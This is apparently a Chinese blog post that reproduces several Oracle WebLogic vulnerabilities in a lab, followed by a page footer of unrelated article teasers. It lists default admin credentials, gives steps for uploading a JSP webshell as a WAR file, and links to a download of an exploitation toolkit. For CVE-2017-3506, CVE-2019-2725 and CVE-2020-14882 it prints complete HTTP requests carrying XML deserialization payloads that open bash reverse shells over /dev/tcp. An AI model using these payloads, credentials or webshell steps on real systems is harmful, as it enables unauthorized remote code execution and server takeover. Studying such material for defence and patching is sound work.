WebLogic常见的几种漏洞

最新推荐文章于 2024-08-18 09:32:18 发布
最新推荐文章于 2024-08-18 09:32:18 发布
阅读量935 收藏 15
点赞数 8
文章标签: 安全 tomcat web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a96482/article/details/141082573
版权

后台弱⼝令GetShell

漏洞描述

通过弱⼝令进⼊后台界⾯ , 上传部署war包 , getshell

影响范围

全版本(前提后台存在弱⼝令)

漏洞复现

默认账号密码:weblogic/Oracle@123

weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic 

这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。

 

 1.登录后台后,点击部署,点击安装,点击上传⽂件。

2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传 

访问部署好的木马文件,然后就哥斯拉连接。

(哥斯拉可以自动生成jsp木马文件,但是生成的木马文件尽量使用哥斯拉连接)

CVE-2017-3506 

XMLDecoder反序列化漏洞

漏洞描述

Weblogic的WLS Security组件对外提供了webserver服务,其中使⽤了XMLDecoder来解析⽤户输⼊的 XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执⾏。

影响版本

受影响版本:WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2。

 漏洞复现

访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在

/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

 

抓包,然后执行反弹shell的命令

POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: your ip:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 841
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
								<void index="1">
                  <string>-c</string>
                </void>
								<void index="2">
                  <string>bash -i &gt;&amp; /dev/tcp/your ip/4444 0&gt;&amp;1</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>

 nc鉴定一个端口

 CVE-2019-2725

漏洞描述


该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,攻击者可以进而获得整台服务器的权限。

 受影响WebLogic版本


Oracle WebLogic Server 10.*
Oracle WebLogic Server 12.1.3

漏洞复现

1、访问漏洞地址 _async/AsyncResponseService 出现 Test page字眼,证明存在漏洞

访问 http://ip:7001/_async/AsyncResponseService 使用POST方法发送特定的xml数据,可以实现各种命令执行。

POST /_async/AsyncResponseService HTTP/1.1
Host: your ip:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADMINCONSOLESESSION=6GvQhQCSj7brk6LwTpPnt22gTpb3JxynjPGk6FW3xVwMzznJhM2W!1628766885
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 794
 
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/your ip/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

 继续nc监听端口,也可以写个木马,访问,用工具连接

CVE-2018-2628

 漏洞描述


Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。

 受影响WebLogic版本


Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3

漏洞复现

访问靶场

 直接使⽤利⽤⼯具(Liqun⼯具箱)

夸克网盘下载地址:https://pan.quark.cn/s/856a1c07b48b
百度网盘下载地址:https://pan.baidu.com/s/1UuhVF_o2Vxl1Za0TZlRoiw?pwd=ofox
官方地址:https://github.com/One-Fox-Security-Team/One-Fox-T00ls

 ​​​​​​​

用liqun扫描上传木马之后,还是用工具连接

 CVE-2018-2894

漏洞描述


CVE-2018-2894漏洞存在于Oracle WebLogic Server的Web服务测试页面(Web Service Test Page)中。这个页面允许用户测试Web服务的功能,但在某些版本中,它包含了一个未经授权的文件上传功能。攻击者可以利用这个漏洞,上传恶意的JSP或其他可执行文件,并在服务器上执行这些文件,从而获得服务器的完全控制权。

受影响的WebLogic Server版本

包括10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3。漏洞影响的页面路径为/ws_utc/begin.do和/ws_utc/config.do。

漏洞复现

 这⾥环境后台密码是随机得,获取密码: docker-compose logs | grep password

这里我们需要访问一个任意上传jsp文件漏洞功能点的目录位置,扫描目录的时候没有扫出来,但是你上网搜素这个CVE-2018-2894都是可以找到这个目录名字的,/ws_utc/config.do(未授权访问

 这个版本必须开启某些功能才能有这种漏洞

第一步 点击base_domain,后点击这个高级

第二步 把这个web服务勾上,然后再点击保存

第三步 修改ws_utc/config.do下的当前的工作目录

/u01/oracle/user_projects/domains/base_domain/tmp/WSTestPageWorkDir
改为

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

 ​​​​​​​

然后开始上传jsp木马文件

 ​​​​​​​

 右键审查元素 , 然后搜索刚上传的木马 , 找到对应时间戳

访问时间戳.jsp

利用工具连接

CVE-2020-14882 

 漏洞描述


远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。

受影响WebLogic版本


Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。

漏洞复现

直接访问 http://192.168.190.1:7001/console/images/%252E%252E%252Fconsole.portal
未授权访问后台 

 抓包然后修改post,写jsp一句话木马反弹shell

 
<?xml version="1.0" encoding="UTF-8" ?>
 <beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans 
http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i >& /dev/tcp/ypur ip/6666 0>&1]]></value>
          </list>
        </constructor-arg>
    </bean>
 </beans>

该漏洞利⽤的缺点是,它要求 Weblogic 服务器能够访问恶意 XML。 

一同吃泥
关注
  • 8
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Weblogic的几个安全隐患
java专栏
05-24 352
google_ad_client = "pub-8800625213955058";/* 336x280, 创建于 07-11-21 */google_ad_slot = "0989131976";google_ad_width = 336;google_ad_height = 280;//<script type="text/java
weblogic安全问题
peng_kan的博客
04-18 1633
web项目的web.xml文件中,加入以下部分.<security-constraint> <web-resource-collection> <web-resource-name>Success</web-resource-name> <url-pattern>/welcome
weblogic 安全漏洞问题解决
weixin_45866907的博客
07-13 135
weblogic 安全漏洞问题解决
加强服务器安全WebLogic
老辉辉的博客
06-15 4698
WebLogic简介:一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。Weblogic部署安全加固大致步骤:①、删除开发与示例程序:开发与示例程序是Weblogic用于指导开发的文档,正式环境中应...
Weblogic 常见漏洞汇总
热门推荐
box
04-20 1万+
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic XMLDecoder反序列化漏洞(CVE-2017-3506) 0x00 漏洞描述 网上爆出weblogic的WLS组件存在xmldecoder
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 8748
一直没有系统的总结过 weblogic漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
03-Weblogic漏洞
qq_57410330的博客
07-26 971
全名:Oracle WebLogic Server,JavaEE服务器商业产品,适用于大型商业项目同类产品:IBM WebSphere、Apache Tomcat、Redhat Jboss7001。
weblogic反序列化漏洞的初级理解(一)
Redredredfish的博客
08-27 4921
啥是weblogic Weblogic反序列化漏洞经过了几个阶段,利用技术也有多种变形 从利用方式来看,分为三类 1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883) 2.利用T3协议配合RMP或ND接口反向发送反序列化数据(CVE2017-3248、CVE2018-2628、CVE2018-2893、CVE2018-3245、CVE-2018-3191、CVE-2020-14
安全:企业上云后不可忽视的安全挑战与解决方案
A526847的博客
08-14 585
企业上云是数字化转型的必然趋势,但云安全风险也如影随形。企业必须正视云安全挑战,采取切实有效的措施来保障云安全。通过数据加密、访问控制、安全审计、备份与恢复、灾备管理、选择可信的云服务供应商和加强内部安全管理等手段,企业可以构建完善的云安全体系,确保云服务的可靠性和安全性。在未来的数字化转型中,云安全将成为企业不可或缺的重要保障。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 415
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 247
AI安全-文生图
等保2.0时代,企业如何平衡安全与发展
waitaikong_的博客
08-14 362
此外,等保2.0还强化了安全管理的要求,企业需要建立完善的安全管理体系,包括安全策略、管理制度、人员培训、应急预案等,以确保安全保护措施的有效实施。等保2.0(网络安全等级保护2.0)是中国网络安全领域的重要标准,它在原有等保1.0的基础上进行了全面升级,以适应云计算、大数据、物联网、移动互联网等新兴技术的安全保护需求。等保2.0的实施促使企业加强网络安全管理和技术防范措施,这不仅有助于提升企业的网络安全防护水平,降低安全风险,还能提高企业的竞争力和信誉度。
NVR方案背景与产品介绍与构建一套完整的NVR产品解决方案
LntonCEC的博客
08-14 701
此外,NVR还可以支持更多的应用场景,由于视频监控系统越来越需要具备扩展性,如果计划在未来增加更多的IP摄像机,那么NVR可能更适合。基于 HiSilicon 平台的 NVR 解决方案凭借其卓越的性能和灵活的功能,已经在市场上占据了一定的份额,并且具有广阔的市场前景。通过友好的管理界面,管理员可以轻松完成用户权限的配置、设备的远程升级、日志的查看与管理等操作。,但都在视频监控中扮演着重要的角色。用户可以通过 GUI 进行摄像机的管理、录像的配置、告警的设置等操作,减少了系统的学习成本,提高了操作效率。
新160个crackme - 030-Acid Bytes.4
qq_41483767的博客
08-14 272
Delphi程序分析,upx脱壳,ida静态分析、动态调试,简单算法
四路一体行车记录仪,语音提示注意行人,保障车辆行驶安全
jiuxindianzi的博客
08-15 271
九盾安防推出四路一体行车记录仪,全方位记录叉车工作场景,实时记录行驶信息,提供高清影像,减少伤亡事故,提升安全性和效率,解决事故责任划分难题,助力企业管理。
理解安全组与防火墙的关系:云安全的双重保障
最新发布
weixin_54574094的博客
08-18 585
通过理解它们的关系,并结合使用,您可以构建一个多层次的安全体系,确保您的系统和数据在面对日益复杂的网络威胁时仍然保持安全。您可以创建一个安全组,添加允许80(HTTP)和443(HTTPS)端口的入站规则,并将此安全组关联到您的Web服务器实例。例如,在一个企业的混合云环境中,您可以通过防火墙来保护本地数据中心的安全,同时通过安全组来管理云上实例的访问权限。安全组可以提供灵活、快速的实例级别的安全管理,而防火墙则负责更广泛的网络安全安全组是云计算环境中使用的虚拟防火墙,用于控制实例的入站和出站流量。
同态加密和SEAL库的介绍(十)CKKS 参数心得 2
WaitMrAnt的博客
08-12 874
本篇继续上篇针对 CKKS 方案的测试,首先证明了重新线性化虽然会减少密文长度,但是并不会对计算结果的精度有明显的影响;模数链的长度确实会限制乘法深度(具体来说是 Rescale 次数),这点上密文乘法和明文乘法相同;上篇中证明了增加 scale 会提高精度,本篇也证明了增长模数链也能增加精度,但是内存测试后,前者 scale 不会提高内存,后者会增加内存成本和时间成本。
Linux 主机一键安全整改策略
weixin_45840241的博客
08-15 608
echo "---------ssh登录前警告banner设置----------"echo "---------禁止root用户远程登录----------"echo "---------设置用户密码过期时间----------"echo "---------设置密码复杂度限制----------"echo "---------配置pacct工具----------"echo "---------禁用不必要的别名----------"安装配置记录用户对设备的操作的pacct工具;
weblogic 反序列化漏洞利用工具
07-31
WebLogic是一种Java EE应用服务器,被广泛用于企业级应用程序的开发和部署。然而,WebLogic也存在反序列化漏洞,这是一种安全漏洞,可能被恶意攻击者利用来执行远程命令或注入恶意代码。 为了利用WebLogic反序列化漏洞,攻击者可能会使用各种不同的工具。这些工具可以帮助攻击者发现和利用漏洞,以实现远程执行代码的目的。 一种常用的WebLogic反序列化漏洞利用工具是ysoserial。该工具可以生成不同类型的恶意Payload,这些Payload可以利用WebLogic的反序列化漏洞执行任意命令或注入恶意代码。攻击者可以使用ysoserial生成有效的Payload,并将其发送给目标WebLogic服务器,从而实现远程执行攻击。 另一个常见的工具是WebLogicScan。该工具用于自动化发现和验证WebLogic反序列化漏洞。它可以扫描目标服务器上的漏洞,并提供漏洞验证和利用的选项。WebLogicScan可以帮助攻击者快速识别潜在的漏洞,以便后续的攻击行动。 WebLogic反序列化漏洞利用工具还包括不同版本的Metasploit框架。Metasploit是一种常用的渗透测试工具,其中包含WebLogic漏洞的模块。攻击者可以使用Metasploit框架中的模块来发现和利用WebLogic漏洞,以执行远程命令或控制目标系统。 总之,WebLogic反序列化漏洞工具是为了发现和利用WebLogic服务器上的安全漏洞,攻击者可能使用ysoserial、WebLogicScan和Metasploit等工具来实现这一目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值